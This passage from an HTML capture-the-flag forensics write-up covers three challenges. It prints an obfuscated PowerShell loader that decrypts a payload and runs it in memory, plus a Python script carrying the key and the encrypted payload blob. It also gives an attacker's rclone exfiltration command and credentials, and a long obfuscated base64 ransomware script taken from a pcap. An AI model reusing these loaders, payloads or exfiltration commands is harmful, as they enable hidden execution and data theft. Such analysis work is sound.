class="nv">$mNKMr</span><span class="p">.</span><span class="n">Dispose</span><span class="p">();</span><span class="nv">$bTMLk</span><span class="p">.</span><span class="n">Dispose</span><span class="p">();</span><span class="nv">$uZOcm</span> <span class="p">=</span> <span class="nv">$bTMLk</span><span class="p">.</span><span class="n">ToArray</span><span class="p">();</span><span class="nv">$gDBNO</span> <span class="p">=</span> <span class="no">[System.Reflection.Assembly]</span><span class="p">::(</span><span class="s1">&#39;daoL&#39;</span><span class="p">[-</span><span class="n">1</span><span class="p">..-</span><span class="n">4</span><span class="p">]</span> <span class="n">-join</span> <span class="s1">&#39;&#39;</span><span class="p">)(</span><span class="nv">$uZOcm</span><span class="p">);</span><span class="nv">$PtfdQ</span> <span class="p">=</span> <span class="nv">$gDBNO</span><span class="p">.</span><span class="n">EntryPoint</span><span class="p">;</span><span class="nv">$PtfdQ</span><span class="p">.</span><span class="n">Invoke</span><span class="p">(</span><span class="nv">$null</span><span class="p">,</span> <span class="p">(,</span> <span class="no">[string[]]</span> <span class="p">(</span><span class="s1">&#39;%*&#39;</span><span class="p">)))</span> </span></span></code></pre></div><p>Short analysis on the script&rsquo;s intention:</p> <ul> <li> <p><strong>Step 1:</strong> Initiates AES decryptor using <code>CBC</code> mode, <code>PKCS7</code> padding mode, <code>key</code> and <code>IV</code> given.</p> </li> <li> <p><strong>Step 2:</strong> Decrypts the encrypted payload (via <code>Window.bat</code>) using the above settings.</p> </li> <li> <p><strong>Step 3:</strong> Decompresses <code>GZip</code>, then run the output as a <code>binary</code>.</p> </li> </ul> <p>We can use this Python script below to get the binary that I have stated in step 3 above.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.Padding</span> <span class="kn">import</span> <span class="n">unpad</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">base64</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">gzip</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">key</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="s1">&#39;0xdfc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">iv</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="s1">&#39;2hn/J717js1MwdbbqMn7Lw==&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">encrypted_message</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="s1">&#39;SEWD/RSJz4q93dq1c+u3tVcKPbLfn1fTrwl01pkHX3+NzcJ42N+ZgqbF+h+S76xsuroW3DDJ50IxTV/PbQICDVPjPCV3DYvCc244F7AFWphPY3kRy+618kpRSK2jW9RRcOnj8dOuDyeLwHfnBbkGgLE4KoSttWBplznkmb1l50KEFUavXv9ScKbGilo9+85NRKfafzpZjkMhwaCuzbuGZ1+5s9CdUwvo3znUpgmPX7S8K4+uS3SvQNh5iPNBdZHmyfZ9SbSATnsXlP757ockUsZTEdltSce4ZWF1779G6RjtKJcK4yrHGpRIZFYJ3pLosmm7d+SewKQu1vGJwcdLYuHOkdm5mglTyp20x7rDNCxobvCug4Smyrbs8XgS3R4jHMeUl7gdbyV/eTu0bQAMJnIql2pEU/dW0krE90nlgr3tbtitxw3p5nUP9hRYZLLMPOwJ12yNENS7Ics1ciqYh78ZWJiotAd4DEmAjr8zU4UaNaTHS8ykbVmETk5y/224dqK1nCN/j/Pst+sL0Yz5UlK1/uPmcseixQw+9kfdnzrjCv/6VOHE0CU5p8OCyD8LEesGNSrT0n76Vc0UvUJz0uKWqBauVAcm9nzt8nt6sccLMzT+/z4ckTaNDMa3CHocd2VAO0iYELHhFmWUL1JZ6X7pvsuiUIJydYySY8p0nLQ4dwx/ZIwOQLDODRvWhHDDIB+uZYRD5Uq6s7lG+/EFkEgw2UZRaIUj4C0O8sFGHVVZIo/Sayn5T4xcX+s73o7VdXJSKT+KyR0FIIvuK/20zWMOn76PXY3UhF9s7JuSUUS+AVtAq50P6br8PjGhwD+PjoElT77AwfmrzBLib05mcofiWLe4WcAJQvR10iWAPTiSe7gIpzNgr3mr7ZCBSLkcPgY9N4aFGGbNRuH+Y4d9NWax7QPqicsGsmsKrfzQ9RZn+mUslsar1RuRoF569RxveMR7mhE3GajkxNP4y3J85BD0B/eRqw6V9odMyBv+i8fYqx359TDCp7XJ7BojuXnwxniIXFbZOPbW+xlRMc2nVQWupQuy8Ebnwzh0/3AYStL+RNDMEDLXizppqR8euPtSQnFSYanmOTh3ZA5KY03LCq0zkzW1Fxs8AFQwWq+C2K9x3ZFX+5HjbjHlSNRhMONNLrAJETSaaeTWD7ZAECSpsEivtwITr15qjzu4b5dIt9cgwycioyJfIEHoo9d2tqMqGP92oR0SBifTTw13kFDzC7nCLu6ZHVe2wML8rQTcWFnpY74DzWj1suNmWXlwXLGhKPHtBCrh3t9zrroPkufl0+pUZgapekMGreS+jZ4MJW22ZD7ZonO47+8fAlA7sNIcoFNNeBdrDzQe+YJFFnywKU+BL10SHXZPkbgwSGmzo4UPnuiHkThJ5igR4HI4W9YACDw9EjzbBD+jkNd1oZv0MqxMOres2CshH4JzE6Z0GYH+AgIjvPBRBrdOQ/6kc1o6GZqzd9CTwNg4ZsFta5JzIoRVoGEztgoP2rBsRnZiipIveaHnFfIQeDbkt5BA1XjVKIovw+jfcjZz7xv93qDY7EV70J12pAPe2zhg1lAVCOwc1EJCO7Poickjw8tDpYmltU9/lQdj4UJVgMCZdf1SFUjb3jTitXSKdMuIuDHG2kmPAfpUcyBWDm0Wz1Zo28fLT96z8ylXQ8mETUwesAOYAJOHaHbIsdbLc0FasotsWygeAdUv7hDUxID4LB22nZKY0dlkJmLHDMHr8yXaGJhvCIFKjaRw8eKmyzlF5abSzqVwD9iM4M3mF6q19v1k6pkmBGkQVTHQwb89AOhggTpzDERqgqWb3+cvkmgSnntxZ/4v2SvI5PAEogBBIXtLr+B4DxLNIGtOztHf6VZejnMuqbyyzG9t85qWFYQXAraCHFaRWiX6sLheZ3tP6gdjSG1o0KcvIvcQmFp1dk52X609/GDZHxOrsIje4bokQnWBZmVtKe0ufH/37+EnXDhWuNIBkggsTD5fJwMIEfQ7lu+A5Aayz8w1GH6KXcnE0Y4+riosdtT+u/CqWHWY/TdxdJwzKM9nEsWEupAcxK9NaNlk7cZfuElDRsGluLZiOnXbATfIY7v+bjJYOu29nqG+tr38yI740D/zbXfq+PIR1sC6Oog4PK0X0HfVGlYikoiy2ODjq5CvYL8YZN1I4Brb964PWRavFNvF7tgys9iOmsGZ+RNajZGb1t2+8T4j6ue8z500PYYWzgKaH9nVaiTNw2pbNgrvGXTh4CRHYaRxDOdUGHCKvctv4qeZ7F8XRyecYjWtCbBNpUunLaD1eFUNHN0xN+g/SEG6vrEMnmgVxtQvmDu43N9tnAZ0wjMQ6noI7xS/VXtHcZqoIhzxeT0X4HjCxJ2wRpQo+RuWHREhvWicDl9eY8osMZhj0vG7g6APyCmsviNWoHSwAfQNccakRht/enUQBWXQoRGHB+YlF/4K/vllKAP6EcdLYAArBLIKeF93QOsP8uHzfaVnCO50lifAsBZMIW03k6T34ivLpgT9BXV46b/X29GS9NBivFvLrJDXtBhnrnK7tnYoMB9IakCBj590g/NJDJM4XFlQdhlsoCCiDpFOcKKai7kaEQZQvCi0eKIgKpHwQUK6w9++Mg2181+r6UujZ9GERHah6mEBpGuVl0GkwZMVfqvF/RztPpV5WECA83G0n6PGlrymJ/JyDYkuwXCHoCmOBlayDxfcHddzWqQp89tQfBIpdiK7sJPRhuXLjuLoksLFLe1IhcMKg3yXKTsujR7pUu8V4mzITMriV4XMEV6SCrjcGNv9sq50w9hddvupLPnH0bokSKKtcLeEl5G98xVTyCs1XOnBCAYwqFwSl7ZmsLRfqpDsI/aXexYr7L13IdUgqUuSZDSjdpvdXXqeGAVxdfOthMMR5JPvXX9xQ2WSRvt3BxV5EogiSgD7EhCI1G6S0/o4HOJeBZ0wtV1TNMB4lWW7zOG92wX469z6cvpdViAXI/fP54yOH2aI1CsgkfQZfQBIlmEvluORIi3A03AhHNlJ0egsiO37mQK+mBe3NRbYQ/SALtrJru4pqmf/ssjwrJXzPJs5n67ohsp3PDCkaJI4W993h7OAz4KhjmhKidW1U7zWi9my2+ramDQ72V3AyY3QqJg6q9I3/RAyJdpCWJSeKsgcHPsxcpB3V6QQ2d2nCN/6tDGDJKVAmNI8AsmkqGtSLWoRyAzvmz0rFxt9jSg5vykZt6QQYH569W7/dXk/E/XELNe2XCdSQwJ3KvwdsnDs5RB+pZv3/aIahKz3udawqAZ2RP2saKic8Y52JR7hjA2HLr1lCqqIjB/6788WXYdpXCTC3hNTfNxxYjVh8FhHxoa8kn/oPodlqeO2WA9d114+5MR4xSoPCLl4v4LMgoSXqJyRIQt1erT4F/pR5umE0bnuCAFD0wCJ9nOHjAaOmMjHx4DYqKSmlbU89MCU1jbbkL8n55tl62Tkpr7zKupuIX+gQrYjUs5R3nQBWPWfPZgS5yTtpQ0LGppPNrU3rDU37WoUVJQnAthXwu7wkNmwExhhUVviJWo2SLd5EtLC/AksmKt+TStlVAYq4y4jCCyogyhTOqc9lX3alkE1WCUX3uHybGc4qnw0IQdSEua3sfFd+eNSY+GMm8f5qu9plIsUo0XP/O7s2sHNxblkGSQf4XEADsiedID9OSkr7Gz702720PJkdWjtKj5Og2c234V6vjygzx9/FoeVDdwFTzL2y4xEgkjJeF7XT3Tg3SQooIw8K5VgB4lIBJPPGrcyIZ26t+jdheluc2olR2u790Z3khi9HrtUwmEt3BU1IZWMHegimI3S4c0zxGPEs/GgJ6tbIx/FukAfb4/TF/hI0JG1sGkXn1N8W6fTY2zR85VTCZkDhBj+7hsij+bNnCELVq9utMS87160NmSdIFy/56sEMSfLR3EuFVuBWN2bXVrjM7qw888B37Xh6DV1pApZHZNnU1zXNkQV8kZRSUfpvTcrN93tBOjmSex/ljz81uF0p94c50TbHsjqfFMk+Lz2d62MX6Hhe+YHtRgupGtvAlsEwuYI5JG5WFASI9yp6AGFpEKYnR+RenAdQ+Z5j4gMlZs0LgH2fbHXXAhIqLh6OhVF2H1Z071E2PNFmypT7v6gfMLGVdIHjXuEJj/jFIqvJ1T2q9F7/paM1ZILQK/QvzvPTB6ioCr3A+HOVCDAc5OfG26R0sUIi+asNcsrPU4/tJXSCYCDHzCabozWnCWq5HFwgKopnam3ZHuxS436xs4SZT3v1RvkoLkEZLlrUhwgXlI7PmpRUbnYHo1Fa25lcvM23QOf0oldx0jF8VVNSKWK98G52TK0h1Bpu+3LUfebuGDg/v6u34oEAnzbXVzYoNVuv4fcefd78WBtQbmqkYWpoq9lGc9oR+cMliEgMSCNhPH9kyaYv71/cD/EScRKnDkkoEZLnQ6lyU+mOJ3Or3PZj9reszg=&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">decrypted_message</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">encrypted_message</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">decrypted_message</span> <span class="o">=</span> <span class="n">unpad</span><span class="p">(</span><span class="n">decrypted_message</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">decrypted_message</span> <span class="o">=</span> <span class="n">gzip</span><span class="o">.</span><span class="n">decompress</span><span class="p">(</span><span class="n">decrypted_message</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;E:/Downloads/out&#39;</span><span class="p">,</span> <span class="s1">&#39;wb&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">decrypted_message</span><span class="p">)</span> </span></span></code></pre></div><p>As a result, we get <a href="https://drive.google.com/file/d/1RsyS6wtl-Dz1HM-0GPDnOYWSxnFMBGoi/view?usp=sharing" target="_blank" rel="noopener">this binary</a>.</p> <p>I also double-checked using <a href="https://www.portablefreeware.com/index.php?id=2757" target="_blank" rel="noopener">Detect It Easy (DIE)</a> to see if it is a valid executable or not.</p> <img src="2.png" alt="DIE" width="1000"/> <p>Voilà, we get the executable! I used <a href="https://github.com/dnSpy/dnSpy" target="_blank" rel="noopener">dnSpy</a> to read the code of the binary. Turned out, the flag is right there to be seen!</p> <img src="3.png" alt="dnSpy" width="1000"/> <p>Flag is: <strong>HTB{0neN0Te?_iT'5_4_tr4P!}</strong></p> <h2 id="packet-cyclone">Packet Cyclone</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1hqRgWipQ_XvLOSa7fQDDVzZ37U3myRbq/view?usp=share_link" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> Pandora’s friend and partner, Wade, is the one that leads the investigation into the relic’s location. Recently, he noticed some weird traffic coming from his host. That led him to believe that his host was compromised. After a quick investigation, his fear was confirmed. Pandora tries now to see if the attacker caused the suspicious traffic during the exfiltration phase. Pandora believes that the malicious actor used rclone to exfiltrate Wade’s research to the cloud. Using the tool called “chainsaw” and the sigma rules provided, can you detect the usage of rclone from the event logs produced by Sysmon? To get the flag, you need to start and connect to the docker service and answer all the questions correctly.</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Forensics</p> </li> <li> <p><strong>Difficulty:</strong> Easy</p> </li> </ul> <p>To get the flag, we need to answer these five question correctly:</p> <p><strong>1.What is the email of the attacker used for the exfiltration process? (for example: <a href="mailto:name@email.com">name@email.com</a>)</strong></p> <p>In the file given, there are 2 YAML files. In these files there is a <a href="https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/" target="_blank" rel="noopener">link</a> which is about detecting <code>Rclone</code>. We can follow what they do to answer our questions.</p> <p>To find the email, i opened <code>Sysmon Operational</code> event log and looked around the events. Then i found this:</p> <img src="001.png" alt="dnSpy" width="1000"/> <p>This event will help us to answer first four questions.</p> <p><strong>Answer:</strong> <code>majmeret@protonmail.com</code></p> <p><strong>2. What is the password of the attacker used for the exfiltration process?</strong></p> <p><strong>Answer:</strong> <code>FBMeavdiaFZbWzpMqIVhJCGXZ5XXZI1qsU3EjhoKQw0rEoQqHyI</code></p> <p><strong>3. What is the Cloud storage provider used by the attacker?</strong></p> <p><strong>Answer:</strong> <code>mega</code></p> <p><strong>4. What is the ID of the process used by the attackers to configure their tool?</strong></p> <p><strong>Answer:</strong> <code>3820</code></p> <p><strong>5. What is the name of the folder the attacker exfiltrated; provide the full path.</strong></p> <p>After reading the link mentioned above, we know that the attacker used command <code>.rclone.exe copy E: remote:data</code> to begin exfiltrated. Hence, I searched for the event that mentions <code>rclone.exe</code>.</p> <img src="002.png" alt="dnSpy" width="1000"/> <p><strong>Answer:</strong> <code>C:\Users\Wade\Desktop\Relic_location</code></p> <p>Flag is: <strong>HTB{3v3n_3xtr4t3rr3str14l_B31nGs_us3_Rcl0n3_n0w4d4ys}</strong></p> <h2 id="bashic-ransomware">Bashic Ransomware</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1EY-quPUPyMjwMo_rJ5jApOcZIrMRnzSw/view?usp=share_link" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> The aliens are gathering their best malware developers to stop Pandora from using the relic to her advantage. They relieved their ancient ransomware techniques hidden for years in ancient tombs of their ancestors. The developed ransomware has now infected Linux servers known to be used by Pandora. The ransom is the relic. If Pandora returns the relic, then her files will be decrypted. Can you help Pandora decrypt her files and save the relic?</p> </li> <li> <p><strong>Category:</strong> Forensics</p> </li> <li> <p><strong>Difficulty:</strong> Hard</p> </li> </ul> <p>We were given four files, including one encrypted flag file, a pcap file and a mem file with their <code>volatility profile</code> which is the zip file.</p> <h3 id="1-pcap-file">1. Pcap file</h3> <p>Looking at the pcap file, we can see a long <code>base64</code> string, i decoded it and get:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="n">gH4</span><span class="p">=</span><span class="s2">&#34;Ed&#34;</span><span class="p">;</span><span class="n">kM0</span><span class="p">=</span><span class="s2">&#34;xSz&#34;</span><span class="p">;</span><span class="n">c</span><span class="p">=</span><span class="s2">&#34;ch&#34;</span><span class="p">;</span><span class="n">L</span><span class="p">=</span><span class="s2">&#34;4&#34;</span><span class="p">;</span><span class="n">rQW</span><span class="p">=</span><span class="s2">&#34;&#34;</span><span class="p">;</span><span class="n">fE1</span><span class="p">=</span><span class="s2">&#34;lQ&#34;</span><span class="p">;</span><span class="n">s</span><span class="p">=</span><span class="s2">&#34; &#39;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rFWesZlWLh3aNZUOH1ERS52QJhWVahlUWlVMadUZ0RWRX9kUwU1V1U1TXpVRhtEcupFdCFjUVVzVTtkRUVWekZUZDRWMZBHZxQFUCNTUGpkRiJHZFFGM0NVZtplRkNVODdlbWdVUVB3dTFzdHJWWsdVT0oURiNlVGZlNatGVrpUVUBzYsFmMjhkTTxGMhZjQE1UY0dlYzh3RhRTWUZlM4V0UYVzaZVFcrlFWkpnUIhnMiJHbtlVNjZUZoZUbUt0aGJ1MOhkV5dWMSBnRUdlcVh0VZlzUkNHctRWN4IDVvp0VTllWupVNnpHTXJlbTlkTrVFbGJjYZp0aURTTsNFN0JzSOxmRNlXVsJGeOZlUyUkbjBDasNUMsdkWyFkaTdnVtp1dB5WTYp1RahnUtlFbOVkU1xWbTdVOVZlSORlYrJVRlpkU65EWOhlTzIEWaZXMHJmcnd0TCh2aWpXQuFVVxs2YRZVRNRkVVJlRwdGVwQmRUVnWEFGeVRlWrZEVlhmVyklRkNDZ1kkbTNjVyoldoREZRxGMhRTVwolSopXU2hGWidlRzEWMOVkV0okMhplWVVlRk5WWoZEMWlkUysESstWYLNGRlVEasRmWCNDZhRmaOFTS6pld0IzY2YlRlhXU6xERCpWWxolVhNlQzEWaCpHZTlzQSNlTwMlQGBjWZxWVVJkVXNlUGVkUKRWbSZEbwQGRsBTYu50aDdFbxolQoBjWS5URUZFZYFVasBDZydGbjVzaxElVk1mVwpkRjJnSH10MKFDTxZVVRpEbrpVcGxGV0Jkek5kWqd1VGZVVKRWMaVkRwMlRkhlUGJleZJEcnNlMRtWWvVzaNlmTY5UNG1WYHRWVZJkRq1UawhlTYxmVlRjUVNVMZxWTUJFWPlXTXR2RxclVrZEbZJkRVJlUWVVU0AzVOFHZU5ESOdlYzU1aZJFbYV1SzVUTYlzahdnSVNmasxWV2RXbRhHOTNmQ1cVW6t2MMVlV6tUYkh0Vrp1VXFFdHRmevZVV4N3VNJTWHVmR5U1YyRmaUJEZERFeNFDVDpkaWBDaqN2Qat2Q4tmVkZXNrFlRoNDVMpkMUtmTuNlQKVVT0MmeTtmRsJlWS1mYNpEWXhXRsFmVxU1VaxWVT5WOD5ESCpnYGpVVSBVNF5ETsV0TUJFVTRzZE9ENVd0Tx82dNBzYU5kcJ5GZ5d3VihXVz0EdCRFZvJFSjZEaXRGcahkV2gmRi1mRwE2dZ1WUwJEWOpmSrNmM4UkT2p1VZ9EZIdVWONDZzIEWS9mRWNGMnRlVth3aNt0bI1EW0l3UrhWRkZXSuRWU41mVHljMMhmWGR1b01WU6h2ROVFZHNVbwJTVL5UbOZVODNmeWVUVHpFWZVjTVFlUsNjWPxGVjBDazYVMNVVZUx2MVlGbsNEeS1WVWhHMWlFeVJmQOhVYtx2VNdXUwQmd0ADTTZ0MjNHZV1EaGJjWzYFRONTT6RmWSh1VUZURa9kSqVlcFhVUpJEWaREbIVmesBTTuZkeZdFbFJGawFlTJh3aXVDbXNlV